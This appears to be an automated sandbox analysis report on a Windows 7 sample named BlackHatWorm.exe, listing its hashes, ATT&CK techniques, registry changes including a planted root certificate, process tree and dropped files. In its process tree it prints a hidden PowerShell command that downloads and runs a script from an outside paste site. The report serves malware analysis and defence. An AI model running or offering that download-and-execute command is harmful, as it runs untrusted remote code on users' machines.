12e3bf7f5ada97ddbbe2df095da92819baf4b380fa7340b6c7a1d1de813f8ae1

Analysis

max time kernel
149s
max time network
123s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
01-09-2024 13:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Black Hat Worm/Black Hat Worm/BlackHatWorm.exe
Size

1.1MB
MD5

ff2d2c4638eabb42aea87ae084f65a6c
SHA1

7599c0c6ac507470ec8c85e9efa9f7bada802feb
SHA256

65c71566954fa20c2806222a6fdfaf4129f16954a89d9e50821aa2d27c41d89f
SHA512

b7864facd647afcbd436a80b3b60dc6b47137e96daa4d087fb0ec0ffc8e36e2c0305424f37cb5a2b3960cb38310b9403f79af83e68dadddb4f591a1389ed2ada
SSDEEP

6144:PbnV479d+YiP3Y3QvevhEtHvSFCW9fQNmn6lCPDA2h:Z4/+YiP3Y3QveuHvSFC5lC7A4

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2672	powershell.exe
2672	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2532	BlackHatWorm.exe

Loads dropped DLL 1 IoCs

pid	Process
2604	BlackHatWorm.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BlackHatWorm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BlackHatWorm.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	BlackHatWorm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	BlackHatWorm.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2672	powershell.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe
2532	BlackHatWorm.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2532	BlackHatWorm.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
2604	BlackHatWorm.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2604	BlackHatWorm.exe
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	2532	BlackHatWorm.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2604 wrote to memory of 1228	2604	BlackHatWorm.exe	31
PID 2604 wrote to memory of 1228	2604	BlackHatWorm.exe	31
PID 2604 wrote to memory of 1228	2604	BlackHatWorm.exe	31
PID 2604 wrote to memory of 1228	2604	BlackHatWorm.exe	31
PID 1228 wrote to memory of 2672	1228	cmd.exe	33
PID 1228 wrote to memory of 2672	1228	cmd.exe	33
PID 1228 wrote to memory of 2672	1228	cmd.exe	33
PID 1228 wrote to memory of 2672	1228	cmd.exe	33
PID 2604 wrote to memory of 2532	2604	BlackHatWorm.exe	35
PID 2604 wrote to memory of 2532	2604	BlackHatWorm.exe	35
PID 2604 wrote to memory of 2532	2604	BlackHatWorm.exe	35
PID 2604 wrote to memory of 2532	2604	BlackHatWorm.exe	35

C:\Users\Admin\AppData\Local\Temp\Black Hat Worm\Black Hat Worm\BlackHatWorm.exe
"C:\Users\Admin\AppData\Local\Temp\Black Hat Worm\Black Hat Worm\BlackHatWorm.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\VE892.bat""
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1228
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -WindowStyle hidden -Command "Invoke-Expression ((Invoke-WebRequest -Uri 'https://rentry.co/owb6fgkv/raw').Content)"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2672
- C:\Users\Admin\AppData\Local\Temp\Black Hat Worm\Black Hat Worm\BlackHatWorm.exe
  "C:\Users\Admin\AppData\Local\Temp\Black Hat Worm\Black Hat Worm\BlackHatWorm.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:2532

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\VE892.bat

Filesize
4KB

MD5
38357e9b0613f8d53f1c4f48ea878a87

SHA1
f29cb48cfc641875a0e1dd2b7885ba690585d088

SHA256
a1ccc3aec53b07556113980c22005cca41048a5a0afb05fa0cb2bed3fe79cd84

SHA512
8959d0e5a756048d6cd9b0d15cc3c32d1e8fc00ce72e4807d3928603371e0ea291be8cfbdb10cf289f4078312d3f59d500be126a0657c2ba973292f3cdc9ba68

Download Submit
\Users\Admin\AppData\Local\Temp\Black Hat Worm\Black Hat Worm\BlackHatWorm.exe

Filesize
1.1MB

MD5
379c5965cce3f840b0fc343db0b0affd

SHA1
118b71977885860edc43c3b8fca2257893249dd7

SHA256
6efbc60a7419fbe7bf732281821b68a12b5e8dc2b0da35f9191d9cc6bcff98b6

SHA512
4bc85b56a12522bcd788d3fae2ded0d2b757dc1f6a0d0ff76066b575236f240ce9aeb3639b617ab7fb4b28e29ff24ec60a273df410b6e1dd7bffe9f3faf85299

Download Submit
memory/2532-21-0x0000000074160000-0x000000007484E000-memory.dmp

Filesize
6.9MB

Download
memory/2532-20-0x0000000000190000-0x00000000002B4000-memory.dmp

Filesize
1.1MB

Download
memory/2532-25-0x0000000074160000-0x000000007484E000-memory.dmp

Filesize
6.9MB

Download
memory/2604-0-0x000000007416E000-0x000000007416F000-memory.dmp

Filesize
4KB

Download
memory/2604-1-0x00000000010D0000-0x00000000011F4000-memory.dmp

Filesize
1.1MB

Download
memory/2604-2-0x0000000074160000-0x000000007484E000-memory.dmp

Filesize
6.9MB

Download
memory/2604-24-0x0000000074160000-0x000000007484E000-memory.dmp

Filesize
6.9MB

Download